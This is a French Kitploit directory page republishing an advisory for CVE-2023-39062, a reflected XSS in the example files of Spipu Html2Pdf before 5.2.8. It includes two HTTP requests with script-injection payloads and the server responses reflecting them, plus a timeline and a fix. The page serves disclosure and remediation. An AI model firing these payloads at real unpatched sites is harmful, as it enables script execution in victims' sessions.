Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-39062 — Spipu Html2Pdf < 5.2.8 - Vulnérabilités XSS dans les fichiers d'exemple | Kitploit
Outils/GitHubGitHub/afine-com/cve-2023-39062
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHubafine-com/cve-2023-39062

CVE-2023-39062

Spipu Html2Pdf < 5.2.8 - Vulnérabilités XSS dans les fichiers d'exemple

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-39062

Spipu Html2Pdf < 5.2.8 - Vulnérabilités XSS dans les fichiers d'exemple.

Chronologie

  • Vulnérabilité signalée à l'éditeur : 18.07.2023
  • Nouvelle version corrigée 5.2.8 publiée : 18.07.2023
  • Divulgation publique : 23.08.2023

Description

Vulnérabilité de type Cross-Site-Scripting (XSS) dans les fichiers d'exemple de Spipu Html2Pdf. Cette vulnérabilité permet à un attaquant d'exécuter du code JavaScript non fiable dans le contexte de l'utilisateur actuellement connecté.

La vulnérabilité existe dans tout paramètre transmis aux fichiers d'exemple example9.php et forms.php.

Exemple de requête vers le script forms.php :

root@kitploit:~
GET /html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script> HTTP/1.1
Host: example.afine.com
Cookie: PHPSESSID=oiqo2oopiqt88teqgfb0a23vk0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

Réponse du serveur :

root@kitploit:~
HTTP/1.1 200 OK
Server: Apache
Content-Length: 2215
Connection: close
Content-Type: text/html; charset=UTF-8

[...]

<page footer="form">
    <h1>Test de formulaire</h1><br>
    <br>
    <form action="http://example.afine.com:443/html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script>">
        <input type="hidden" name="test" value="1">

[...]

Exemple de requête vers le script example9.php :

root@kitploit:~
GET /html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/?nom=1 HTTP/1.1
Host: example.afine.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

Réponse du serveur :

root@kitploit:~
HTTP/1.1 200 OK
Date: Sat, 08 Jul 2023 18:32:51 GMT
Server: Apache
X-Powered-By: PHP/7.4.8
Content-Length: 795
Connection: close
Content-Type: text/html; charset=UTF-8

[...]

<body>
<br>
Ceci est un exemple de génération de PDF via un bouton :)<br>
<br>
<img src="http://example.afine.com/html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/res/exemple09.png.php?px=5&amp;py=20" alt="image_php" ><br>
<br>
<br>
        <form method="get" action="">

[...]

Ce problème a été causé par un manque de neutralisation des paramètres de requête fournis. Ce problème a été corrigé dans la version 5.2.8 de Spipu Html2Pdf.

Versions affectées

< 5.2.8

Avis

Mettez à jour Spipu Html2Pdf vers la version 5.2.8 ou une version plus récente.

Références

  • https://github.com/spipu/html2pdf/blob/92afd81823d62ad95eb9d034858311bb63aeb4ac/CHANGELOG.md
  • https://nvd.nist.gov/vuln/detail/CVE-2023-39062
Télécharger l’outil